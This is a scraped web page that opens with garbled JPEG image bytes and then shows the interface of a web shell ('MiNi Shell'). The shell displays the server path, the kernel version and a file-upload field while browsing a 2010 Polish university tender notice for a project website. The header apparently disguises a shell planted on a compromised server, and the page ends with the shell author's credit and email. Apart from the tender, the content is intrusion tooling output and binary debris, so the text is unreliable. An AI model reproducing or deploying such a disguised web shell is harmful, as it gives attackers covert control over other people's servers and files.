JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20100625/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20100625/166339-N-2010.html

<p class="kh_header"><b>Łódź: Zaprojektowanie, wykonanie oraz administracja strony internetowej projektu pt. Centrum Technologii Informatycznych Politechniki Łódzkiej współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego, w ramach działania 13.1 priorytetu XIII Programu Operacyjnego Infrastruktura i Środowisko   2007-2013</b><br>
<b>Numer ogłoszenia: 166339 - 2010; data zamieszczenia: 25.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Łódzka - Centrum Technologii Informatycznych , ul. Żeromskiego 116, 90-924 Łódź, woj. łódzkie, tel. 042 6312645, faks 042 6360327.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie, wykonanie oraz administracja strony internetowej projektu pt. Centrum Technologii Informatycznych Politechniki Łódzkiej współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego, w ramach działania 13.1 priorytetu XIII Programu Operacyjnego Infrastruktura i Środowisko   2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Wymagania ogólne.

Przedmiotem zamówienia jest  zaprojektowanie, wykonanie oraz administracja strony internetowej projektu pt.: Centrum Technologii Informatycznych Politechniki Łódzkiej współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego, w ramach działania 13.1 priorytetu XIII Programu Operacyjnego Infrastruktura i Środowisko 2007-2013.

Wykonawca przekaże Zamawiającemu kod źródłowy Strony i pliki źródłowe wszystkich elementów wykorzystanych do jej budowy, w tym źródłowe pliki graficzne.

Wykonawca przekaże Zamawiającemu majątkowe prawa autorskie na wszystkich polach eksploatacji do wytworzonej Strony.

Ze względu na istniejącą infrastrukturę serwerową Zamawiającego Strona musi zostać oparta o technologię Java EE i działać pod kontrolą serwera aplikacyjnego Tomcat v 6.0.14 i wykorzystywać bazę danych MySQL v 5.0.5. Wykonawca jest zobowiązany do uruchomienia Strony na serwerze wskazanym przez Zamawiającego. Wykonawca otrzyma dostęp do serwera Zamawiającego w zakresie umożliwiającym instalację strony.

Strona powinna być oparta na wzorcu projektowym MVC, a dostęp do bazy danych powinien być realizowany przez bibliotekę typu ORM. Strona musi w całości wspierać mechanizm Single Sign On.

Odbiór Strony musi zostać potwierdzony przez Zamawiającego w postaci pisemnego protokołu odbioru, stanowiącego jednocześnie podstawę wystawienia faktury przez Wykonawcę.

Wykonawca zobowiązuje się także do administracji Strony przez okres od momentu od 01.09.2010r. do 30.06.2013r. z możliwością przedłużenia umowy, maksymalnie na cztery lata, w tym do wprowadzania modyfikacji do Strony według wymagań Zamawiającego w wymiarze nie przekraczającym 30 godzin pracy programisty miesięcznie. Rozliczenie godzin następować będzie na podstawie zbiorczej karty czasu pracy z wyszczególnieniem zakresu prac i liczbą osobo-godzin, składanej raz na kwartał wraz z protokołem odbioru prac i fakturą. Niewykorzystane godziny w danym miesiącu kalendarzowym podlegają kumulacji na kolejne miesiące.

Wykonawca zobowiązuje się do wykonywania cotygodniowych kopii strony oraz do wersjonowania kolejnych wersji Strony każdorazowo po wykonaniu modyfikacji (według wskazówek Zamawiającego) w odpowiednim środowisku wersjonującym (np. SVN). Wykonawca jest zobowiązany zapewnić zdalny dostęp Zamawiającemu do używanego środowiska wersjonującego oraz do zbioru kopii zapasowych przez cały okres trwania umowy.

Strona zostanie wykonana zgodnie z najnowszymi standardami opublikowanymi przez organizację W3 Consortium (http: //www.w3.org), w tym w szczególności co najmniej: XHTML 1.1 Strict, pozycjonowanie elementów oparte na elementach blokowych (nie na tabelach) i będzie się poprawnie wyświetlać w przeglądarkach: IE 6.0 i wyżej, Firefox 2.0 i wyżej, Opera 9.0 i wyżej, Google Chrome 1.0 i wyżej, Safari 3.0 i wyżej. Ponadto Strona powinna się wyświetlać poprawnie na platformach mobilnych wyposażonych w przeglądarkę internetową. Strona będzie dostosowana do potrzeb osób niepełnosprawnych, w tym w szczególności będzie zgodna z WAI.

Wykonawca wykona 3 przykładowe profesjonalne szaty graficzne Strony do wyboru dla Zamawiającego zgodne z zasadami identyfikacji wizualnej Politechniki Łódzkiej. Wizualizacja strony musi być także zgodna z wytycznymi POIiŚ w zakresie promocji (opis na: http://www.opi.org.pl/pl/informacja-i-promocja1/). Wykonawca będzie zobowiązany do wprowadzenia wszystkich treści dostarczonych przez Zamawiającego (przed dokonaniem odbioru).  Strona powinna posiadać dwie spójnie graficznie wersje językowe: angielską i polską. 

Strona zostanie wyposażona w dedykowany system CMS pozwalający na:
a) edytowanie pozycji menu (w tym także tworzenie podmenu) i przypisywanie do niego podstron
b) edytowanie treści podstron za pomocą narzędzia pozwalającego to robić bez konieczności pracy na otwartym kodzie HTML
c) dodawanie plików o dowolnym rozmiarze i typie i tworzenie do nich linków
d) zamieszczania plików graficznych w galerii zdjęć (zdjęcie + podpis)
 
Strona powinna mieć w części chronionej zintegrowane forum, funkcjonalność newslettera oraz moduł służący do wysyłania wewnętrznych wiadomości pomiędzy edytorami, a administratorem.

Dostęp do części chronionej Strony możliwy będzie wyłącznie po zalogowaniu przy użyciu protokołu HTTPS.

Strona powinna posiadać w części publicznej niewidoczny licznik odsłon strony wraz 
z możliwością podglądu przez Administratora skąd przychodzą zapytania (kraj, województwo)

2. Role użytkowników Strony.

a) Gość - niezalogowany użytkownik posiadający wyłącznie prawo przeglądania stron dostępnych publicznie
b) Administrator - zalogowany użytkownik posiadający dostęp do wszystkich paneli administracyjnych
c) Edytor - zalogowany użytkownik posiadający prawo edycji wybranych podstron

3. Część publiczna Strony.

Część publiczna powinna umożliwiać przeglądanie treści umieszczonych pod zdefiniowanymi przez Administratora pozycjami menu.

4. Część chroniona strony. 

Część chroniona strony jest dostępna wyłącznie po zalogowaniu dla użytkowników posiadających role Administratora lub Edytora.


4.1 Funkcjonalności dla roli Edytor.

Edytor ma możliwość oglądania wszystkich stron zdefiniowanych w części chronionej oraz edycji wybranych stron (uprawnienia nadaje Administrator). Lista stron przeznaczonych do edycji przez Edytora powinna być widoczna w postaci hierarchicznego drzewka odpowiadającego w swojej hierarchii strukturze zdefiniowanego menu, przypominającego drzewko exploratora  systemu operacyjnego Windows i zbudowanego w oparciu o technologię AJAX. 
Edytor może się zapisać/wypisać z newslettera, wysyłać wewnętrzne wiadomości oraz korzystać z Forum.

4.2. Funkcjonalność dla roli  Administrator.

Administrator ma możliwość:
a) tworzenia całkowitej struktury wielopoziomowego menu  podzielonego na część publiczną i część chronioną
b) zarządzania Edytorami (dodawanie, edycja, usuwanie, przypisywanie/zabieranie prawa edycji do wybranych podstron). Edytor jest opisywany przez następujące pola: imię, nazwisko, login (email). Po dodaniu edytora na podany adres email wysyłane jest do niego losowo wygenerowane 8 znakowe hasło. Edytor ma prawo zmienić hasło po zalogowaniu. Hasła trzymane są w bazie danych w postaci zaszyfrowanej. Dodatkowo Administrator ma prawo wysłania nowego losowo wygenerowanego hasła do Edytora, który je zapomniał
c) Administrator ma możliwość edycji wszystkich struktur menu i wszystkich treści stron
d) edycja i wysyłanie newslettera

4.3.Zakres czynności związany z administrowaniem strony.

- zmiana szaty graficznej w tym nieuzupełnienia i modyfikacje, 
- modyfikacja opracowanego systemu cms zgodnie z wytycznymi zamawiającego, 
- dodawanie modułów nie uwzględnionych w specyfikacji w zakresie liczby 
godzin wskazanym w SIWZ (np.  licznika odliczającego do dnia oddania budynku), 
- wykonywanie modyfikacji portalu zgodnie z wytycznymi zamawiającego, 
- wykonywania interfejsów do nowych modułów, 
- wykonywanie kopii zapasowych, 
- asysta przy migracji sprzętowej,

4.4. Dodatkowe informacje.

Wykonawca zobowiązuje się do przeprowadzenia szkolenia z zarządzania stroną, jednocześnie zapewniając materiały szkoleniowe oraz zobowiązuje się do wsparcia technicznego w przypadku jakichkolwiek problemów z obsługą strony.

Wykonawca przedstawi projekt strony w trzech szatach graficznych w ciągu 10 dni roboczych od daty podpisania umowy, natomiast Zamawiający ma trzy dni robocze na akceptację projektu strony. W przypadku braku akceptacji  projektu Wykonawca ma trzy dni robocze na poprawę projektu, natomiast Zamawiający również trzy dni na akceptację poprawionego projektu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.41.30.00-8, 72.41.50.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu dokonana zostanie w oparciu o informacje zawarte w złożonych wraz z ofertą dokumentach na zasadzie spełnia/nie spełnia. 
Niespełnienie choćby jednego z warunków wymaganych od wykonawców skutkować będzie wykluczeniem wykonawcy z postępowania z zastrzeżeniem art. 26 ust. 3 i 4 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu dokonana zostanie 
w oparciu o informacje zawarte w złożonych wraz z ofertą dokumentach na zasadzie spełnia/nie spełnia. 
Niespełnienie choćby jednego z warunków wymaganych od wykonawców skutkować będzie wykluczeniem wykonawcy z postępowania z zastrzeżeniem art. 26 ust. 3 i 4 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu dokonana zostanie 
w oparciu o informacje zawarte w złożonych wraz z ofertą dokumentach na zasadzie spełnia/nie spełnia. 
Niespełnienie choćby jednego z warunków wymaganych od wykonawców skutkować będzie wykluczeniem wykonawcy z postępowania z zastrzeżeniem art. 26 ust. 3 i 4 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu dokonana zostanie 
w oparciu o informacje zawarte w złożonych wraz z ofertą dokumentach na zasadzie spełnia/nie spełnia. 
Niespełnienie choćby jednego z warunków wymaganych od wykonawców skutkować będzie wykluczeniem wykonawcy z postępowania z zastrzeżeniem art. 26 ust. 3 i 4 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu dokonana zostanie 
w oparciu o informacje zawarte w złożonych wraz z ofertą dokumentach na zasadzie spełnia/nie spełnia. 
Niespełnienie choćby jednego z warunków wymaganych od wykonawców skutkować będzie wykluczeniem wykonawcy z postępowania z zastrzeżeniem art. 26 ust. 3 i 4 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.p.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.zp.p.lodz.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.07.2010 godzina 10:00, miejsce: Politechnika Łódzka, Biuro Projektu Centrum Technologii Informatycznych Politechniki Łódzkiej, 90-924 Łódź, ul. Wólczańska 221/223, budynek B-18, I p. pokój nr 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego, w ramach działania 13.1 priorytetu XIII Programu Operacyjnego Infrastruktura i Środowisko 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com